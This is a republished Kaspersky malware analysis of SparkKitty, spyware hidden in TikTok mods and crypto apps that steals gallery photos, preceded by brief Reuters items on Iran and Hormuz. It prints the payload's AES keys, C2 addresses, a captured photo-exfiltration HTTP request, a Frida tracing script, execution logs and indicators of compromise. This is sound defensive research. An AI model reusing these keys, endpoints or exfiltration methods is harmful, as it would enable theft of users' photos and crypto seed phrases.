    “The concerns of retaliation and this war escalating are huge, especially closing of the Strait of Hormuz by Iran is something that would be extremely dangerous and not good for anybody,” Kaja Kallas told reporters ahead of a meeting with EU foreign ministers.

    Iran’s Press TV reported on Sunday that Iran’s Supreme National Security Council needed to make a final decision on whether to close the strait, after parliament was reported to back the measure. About 20% of global oil and gas demand flows through the channel.

    More to follow.

    (Reuters)

    June 23, 2025
  • Any Iranian closure of Hormuz Strait would be ‘extremely dangerous’, EU’s top diplomat says

    Source: Government of India

    Source: Government of India (4)

    An Iranian closure of the Strait of Hormuz would be dangerous and “not good for anybody”, the European Union’s top diplomat said on Monday.

    “The concerns of retaliation and this war escalating are huge, especially closing of the Strait of Hormuz by Iran is something that would be extremely dangerous and not good for anybody,” Kaja Kallas told reporters ahead of a meeting with EU foreign ministers.

    Iran’s Press TV reported on Sunday that Iran’s Supreme National Security Council needed to make a final decision on whether to close the strait, after parliament was reported to back the measure. About 20% of global oil and gas demand flows through the channel.

    More to follow.

    (Reuters)

    June 23, 2025
  • MIL-OSI Banking: SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play

    Source: Securelist – Kaspersky

    Headline: SparkKitty, SparkCat’s little brother: A new Trojan spy found in the App Store and Google Play

    In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.

    Here are the key facts about this new threat:

    • The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
    • On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
    • The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
    • While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
    • The campaign has been active since at least February 2024.

    It all began with a suspicious online store…

    During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.

    1

    2

    3

    4

    5

    6

    7

    8

    9

    {

        “links”: {

            “shopCenter”: “https://h1997.tiktokapp.club/wap/?”,

            “goodsList”: “https://h1997.tiktokapp.club/www/?”,

            “orderList”: “https://h1997.tiktokapp.club/www/?”,

            “reg”: “https://www.baidu.com”,

            “footbar”: “https://www.baidu.com”

        }

    }

    The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.

    Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.

    {{if ext==”ipa”}}

    {{else}}

    {{/if}}

    1

    2

    3

    4

    5

    6

    7

    div class=“t-name”>

        div class=“tit”>

        {{if ext==“ipa”}}

             i class=“iconfont icon-iphone” style=“font-size:inherit;margin-right:5px”>/i>

        {{else}}

             i class=“iconfont icon-android” style=“font-size:inherit;margin-right:5px”>/i>

        {{/if}}

    iOS app delivery method

    And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.

    iOS app download page

    As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.

    Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.

    DER-Encoded-Profile
    OMITTED

    Entitlements

    application-identifier
    EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp

    keychain-access-groups

    EHQ3N2D5WH.*
    com.apple.token

    get-task-allow

    com.apple.developer.team-identifier
    EHQ3N2D5WH

    ExpirationDate
    2026-01-20T06:59:55Z
    Name
    syf
    ProvisionsAllDevices
    TeamIdentifier

    EHQ3N2D5WH

    TeamName
    SINOPEC SABIC Tianjin Petrochemical Co. Ltd.
    TimeToLive
    365
    UUID
    55b65f87-9102-4cb9-934a-342dd2be8e25
    Version
    1

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34

    35

    36

    37

    38

    39

    40

    41

    42

    43

    44

    45

    46

    47

    48

    49

    50

    51

    52

    53

    54

    55

    56

    57

    58

    59

    60

    61

    62

    63

    64

    65

    66

    67

    xml version=“1.0” encoding=“UTF-8”?>

    !DOCTYPE plist PUBLIC “-//Apple//DTD PLIST 1.0//EN” “http://www.apple.com/DTDs/PropertyList-1.0.dtd”>

    plist version=“1.0”>

    dict>

    key>AppIDName/key>

    string>rdcUniApp/string>

    key>ApplicationIdentifierPrefix/key>

    array>

    string>EHQ3N2D5WH/string>

    /array>

    key>CreationDate/key>

    date>2025–01–20T06:59:55Z/date>

    key>Platform/key>

    array>

    string>iOS/string>

    string>xrOS/string>

    string>visionOS/string>

    /array>

    key>IsXcodeManaged/key>

    false/>

    key>DeveloperCertificates/key>

    array>

    data>OMITTED/data>

    /array>

    key>DER–Encoded–Profile/key>

    data>OMITTED/data>

    key>Entitlements/key>

    dict>

    key>application–identifier/key>

    string>EHQ3N2D5WH.com.ss–tpc.rd.rdcUniApp/string>

    key>keychain–access–groups/key>

    array>

    string>EHQ3N2D5WH.*/string>

    string>com.apple.token/string>

    /array>

    key>get–task–allow/key>

    false/>

    key>com.apple.developer.team–identifier/key>

    string>EHQ3N2D5WH/string>

    /dict>

    key>ExpirationDate/key>

    date>2026–01–20T06:59:55Z/date>

    key>Name/key>

    string>syf/string>

    key>ProvisionsAllDevices/key>

    true/>

    key>TeamIdentifier/key>

    array>

    string>EHQ3N2D5WH/string>

    /array>

    key>TeamName/key>

    string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd./string>

    key>TimeToLive/key>

    integer>365/integer>

    key>UUID/key>

    string>55b65f87–9102–4cb9–934a–342dd2be8e25/string>

    key>Version/key>

    integer>1/integer>

    /dict>

    /plist>

    Example of a provisioning profile installed to run a malicious TikTok mod

    In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:

    key>ProvisionsAllDevices/key>

    true/>

    It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:

    Profile installation flow

    Looking for copper, found gold

    Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.

    Suspicious store opened inside a TikTok app

    It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.

    The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.

    Malicious class entry point

    The malicious payload functions as follows:

    1. It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
    2. It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
    3. The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
    4. The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:

      1

      {“msg”:“success”,“code”:0,“status”:“1”}

      The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.

    5. Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.

    Photo exfiltration and upload

    Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    PUT /api/putImages HTTP/1.1

    Host: 23.249.28.88:7777

    Content–Type: multipart/form–data; boundary=Boundary+C9D8BE3781515E01

    Connection: keep–alive

    Accept: */*

    User–Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)

    Accept–Language: en–US;q=1, ja–US;q=0.9, ar–US;q=0.8, ru–US;q=0.7

    Content–Length: 80089

    Accept–Encoding: gzip, deflate

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“appname”

    TikTok

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“buid”

    com.zhiliaoapp.musically

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“device”

    ios

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“userId”

    xxxxxxxx–xxxx–xxxx–xxxx–xxxxxxxxxxxx

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“uuid”

    xxxxxxxx–xxxx–xxxx–xxxx–xxxxxxxxxxxx/Lx/xxx

    —Boundary+C9D8BE3781515E01

    Content–Disposition: form–data; name=“image”; filename=““

    Content–Type: image/jpeg

    ......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM……..8BIM.%................ ...B~...4ICC_PROFILE……$appl....mntrRGB XYZ .......

    Digging deeper

    When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.

    Checking C2 addresses

    The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.

    Uploading image and device information

    Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:

    1. The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.

    Procedure for obtaining C2 addresses

    1. Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.

    Finding the shortest response time

    1. The code uses custom names for classes, methods, and fields.
    2. It is written in Kotlin. Other versions we found were written in Java.

    Spyware in official app stores

    One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.

    Infected app on Google Play

    Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.

    Infected app page on the App Store

    In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.

    Checking the server response and sending a photo

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34

    35

    36

    37

    38

    39

    40

    41

    42

    43

    {

        code = 0;

        data =     {

            27 =         (

            );

            50002 =         (

                            {

                    appVersion = “”;

                    cTime = 1696304011000;

                    id = 491;

                    imgSubTitle = “”;

                    imgTitle = “U70edU5f00U5173Uff08U65b0Uff09”;

                    imgType = 50002;

                    imgUrl = 0;

                    imgUrlSub = “”;

                    isFullScreen = 0;

                    isNeed = 1;

                    isSkip = 1;

                    langType = all;

                    operator = 0;

                    skipUrl = “”;

                    sort = 10000;

                    source = 0;

                    type = 0;

                    uTime = timestamp>;

                }

            );

        };

        dialog =     {

            cancelAndClose = 0;

            cancelBtn = “”;

            cancelColor = “”;

            code = 0;

            confirmBtn = “”;

            confirmColor = “”;

            content = “”;

            contentColor = “”;

            time = “”;

            title = OK;

            titleColor = “”;

            type = 3;

            url = “”;

        };

    Sample server response

    In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.

    Retrieving and sending photos

    Suspicious libcrypto.dylib mod

    During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.

    Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.

    Section of obfuscated code for loading the malicious URL

    Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:

    //print backtrace
    console.log(bt.map(DebugSymbol.fromAddress).join(“n”));
    }

    },
    onLeave: function(retval) {
    if (exit_log == 1) {
    console.warn(“n***extiting “, name);
    console.log(this.context.x0.readByteArray(64));
    }
    }
    });
    }

    var malInited = false;
    var malFunc;
    function callMalware() {
    if (!malInited) {
    malFunc = new NativeFunction(base.add(0x7A77CC), ‘void’, []);
    traceModule(base.add(0x821360), ‘objc_msgSend’);
    malInited = true;
    }
    malFunc();
    }

    var mname = “wc.dylib”;
    var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
    console.log(‘Base address: ‘, base);
    malFunc();

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

    31

    32

    33

    34

    35

    36

    37

    38

    39

    40

    41

    42

    43

    44

    45

    46

    47

    48

    49

    50

    51

    52

    53

    54

    55

    56

    57

    58

    59

    function traceModule(impl, name)

    {

        console.log(“Tracing “ + name, impl);

        var exit_log = 0;

        Interceptor.attach(impl, {

            onEnter: function(args) {

                var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);

                if (!moduleMap) {

                    moduleMap = new ModuleMap();

                }

                var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);

                // we want to trace only calls originating from malware dylib

                if (modules.filter(x => x.includes(‘wc.dylib’)).length > 0) {

                    exit_log = 1;

                    console.warn(“n*** entering “ + name);

                    if(name.includes(‘objc_msgSend’)) {

                        var sel = this.context.x1.readUtf8String();

                        if (sel.includes(“stringWithCString:”)) {

                            var s = this.context.x2.readUtf8String();

                            if (s.includes(‘.cn-bj.ufileos.com’)) {

                                console.log(“Replacing URL: “, s);

                                var news = Memory.allocUtf8String(‘https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121’);

                                this.context.x2 = news;

                                console.log(“New URL: “, this.context.x2.readUtf8String());

                            }

                            else

                                console.log(s);

                        }

                    }

                    //print backtrace

                    console.log(bt.map(DebugSymbol.fromAddress).join(“n”));

                }

              

            },

            onLeave: function(retval) {

                if (exit_log == 1) {

                    console.warn(“n***extiting “, name);

                    console.log(this.context.x0.readByteArray(64));

                }

            }

        });

    }

    var malInited = false;

    var malFunc;

    function callMalware() {

        if (!malInited) {

            malFunc = new NativeFunction(base.add(0x7A77CC), ‘void’, []);

            traceModule(base.add(0x821360), ‘objc_msgSend’);

            malInited = true;

        }

        malFunc();

    }

    var mname = “wc.dylib”;

    var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;

    console.log(‘Base address: ‘, base);

    malFunc();

    Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.

    *** entering objc_msgSend
    ### Creating NSString with api endpoint decrypted somewhere in code
    [ 0x20193a010 stringWithCString:”%@/api/getStatus?buid=%@&appname=%@&userId=%@” encoding: ]
    0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
    0x102783264 wc.dylib!0x7d3264 (0x7d3264)

    ### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

    *** entering objc_msgSend
    ### Getting server response as data object
    [ 0x2022d5078 initWithData:encoding: ]
    0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
    0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

    *** leaving objc_msgSend
    ### Server response in bytes

    00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A….!……….
    00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{“msg”:”success
    00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a “,”code”:0,”us”:
    00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,”status”:”0″}.

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    *** entering objc_msgSend

    ### Creating NSString object with decrypted string

    [ 0x20193a010   stringWithCString:“http://84.17.37.155:8081” encoding: ]

    0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)

    0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)

    *** entering objc_msgSend

    ### Creating NSString with api endpoint decrypted somewhere in code

    [ 0x20193a010   stringWithCString:“%@/api/getStatus?buid=%@&appname=%@&userId=%@” encoding: ]

    0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)

    0x102783264 wc.dylib!0x7d3264 (0x7d3264)

    ### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

    *** entering objc_msgSend

    ### Getting server response as data object

    [ 0x2022d5078   initWithData:encoding: ]

    0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)

    0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

    *** leaving objc_msgSend

    ### Server response in bytes

    00000000  41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00  A....!..........

    00000010  2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73  .{“msg”:“success

    00000020  22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a  “,“code”:0,“us”:

    00000030  31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00  1,“status”:“0”}.

    The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.

    Another activity cluster?

    During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.

    Scam platform account on YouTube

    Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.

    App download links

    Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.

    Code snippet for photo uploads

    We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:

    1. The malicious apps also focus on cryptocurrency themes.
    2. Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
    3. The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.

    Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.

    Campaign goals and targets

    Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:

    1. A crypto-only store was embedded within the TikTok app alongside the spyware.
    2. Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
    3. The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.

    Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
    Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:

    • Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
    • In both campaigns, we found the same infected Android apps.
    • Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.

    Takeaways

    Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.

    Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.

    Our security products return the following verdicts when detecting malware associated with this campaign:

    • HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
    • HEUR:Trojan-Spy.IphoneOS.SparkKitty.*

    Indicators of compromise

    Infected Android apps

    b4489cb4fac743246f29abf7f605dd15
    e8b60bf5af2d5cc5c501b87d04b8a6c2
    aa5ce6fed4f9d888cbf8d6d8d0cda07f
    3734e845657c37ee849618e2b4476bf4
    fa0e99bac48bc60aa0ae82bc0fd1698d
    e9f7d9bc988e7569f999f0028b359720
    a44cbed18dc5d7fff11406cc403224b9
    2dc565c067e60a1a9656b9a5765db11d
    66434dd4402dfe7dda81f834c4b70a82
    d851b19b5b587f202795e10b72ced6e1
    ce49a90c0a098e8737e266471d323626
    cc919d4bbd3fb2098d1aeb516f356cca
    530a5aa62fdcca7a8b4f60048450da70
    0993bae47c6fb3e885f34cb9316717a3
    5e15b25f07020a5314f0068b474fff3d
    1346f987f6aa1db5e6deb59af8e5744a

    Infected iOS apps

    21ef7a14fee3f64576f5780a637c57d1
    6d39cd8421591fbb0cc2a0bce4d0357d
    c6a7568134622007de026d22257502d5
    307a64e335065c00c19e94c1f0a896f2
    fe0868c4f40cbb42eb58af121570e64d
    f9ab4769b63a571107f2709b5b14e2bc
    2b43b8c757c872a19a30dcdcff45e4d8
    0aa1f8f36980f3dfe8884f1c6f5d6ddc
    a4cca2431aa35bb68581a4e848804598
    e5186be781f870377b6542b3cecfb622
    2d2b25279ef9365420acec120b98b3b4
    149785056bf16a9c6964c0ea4217b42b
    931399987a261df91b21856940479634

    Malicious iOS frameworks

    8c9a93e829cba8c4607a7265e6988646
    b3085cd623b57fd6561e964d6fd73413
    44bc648d1c10bc88f9b6ad78d3e3f967
    0d7ed6df0e0cd9b5b38712d17857c824
    b0eda03d7e4265fe280360397c042494
    fd4558a9b629b5abe65a649b57bef20c
    1b85522b964b38de67c5d2b670bb30b1
    ec068e0fc6ffda97685237d8ab8a0f56
    f10a4fdffc884089ae93b0372ff9d5d1
    3388b5ea9997328eb48977ab351ca8de
    931085b04c0b6e23185025b69563d2ce
    7e6324efc3acdb423f8e3b50edd5c5e5
    8cfc8081559008585b4e4a23cd4e1a7f

    Obfuscated malicious iOS libraries

    0b7891114d3b322ee863e4eef94d8523
    0d09c4f956bb734586cee85887ed5407
    2accfc13aaf4fa389149c0a03ce0ee4b
    5b2e4ea7ab929c766c9c7359995cdde0
    5e47604058722dae03f329a2e6693485
    9aeaf9a485a60dc3de0b26b060bc8218
    21a257e3b51561e5ff20005ca8f0da65
    0752edcf5fd61b0e4a1e01371ba605fd
    489217cca81823af56d141c985bb9b2c
    b0976d46970314532bc118f522bb8a6f
    f0460bdca0f04d3bd4fc59d73b52233b
    f0815908bafd88d71db660723b65fba4
    6fe6885b8f6606b25178822d7894ac35

    Download links for infected apps

    hxxps://lt.laoqianf14[.]top/KJnn
    hxxps://lt.laoqianf15[.]top/KJnn
    hxxps://lt.laoqianf51[.]top/KJnn
    hxxps://yjhjymfjnj.wyxbmh[.]cn/2kzos8?a45dd02ac=d4f42319a78b6605cabb5696bacb4677
    hxxps://xt.xinqianf38[.]top/RnZr

    Pages distributing Trojans

    hxxps://accgngrid[.]com
    hxxps://byteepic[.]vip

    C2 and configuration storage

    C2:
    23.249.28[.]88
    120.79.8[.]107
    23.249.28[.]200
    47.119.171[.]161
    api.fxsdk.com

    Configurations
    hxxp://120.78.239[.]17:10011/req.txt
    hxxp://39.108.186[.]119:10011/req.txt
    hxxps://dhoss-2023.oss-cn-beijing.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
    hxxps://sdk-data-re.oss-accelerate.aliyuncs[.]com/JMUCe7txrHnxBr5nj.txt
    hxxps://gitee[.]com/bbffipa/data-group/raw/master/02WBUfZTUvxrTMGjh7Uh
    hxxps://ok2025-oss.oss-cn-shenzhen.aliyuncs[.]com/ip/FM4J7aWKeF8yK
    hxxps://file-ht-2023.oss-cn-shenzhen.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
    hxxps://afwfiwjef-mgsdl-2023.oss-cn-shanghai.aliyuncs[.]com/path/02WBUfZTUvxrTMGjh7Uh
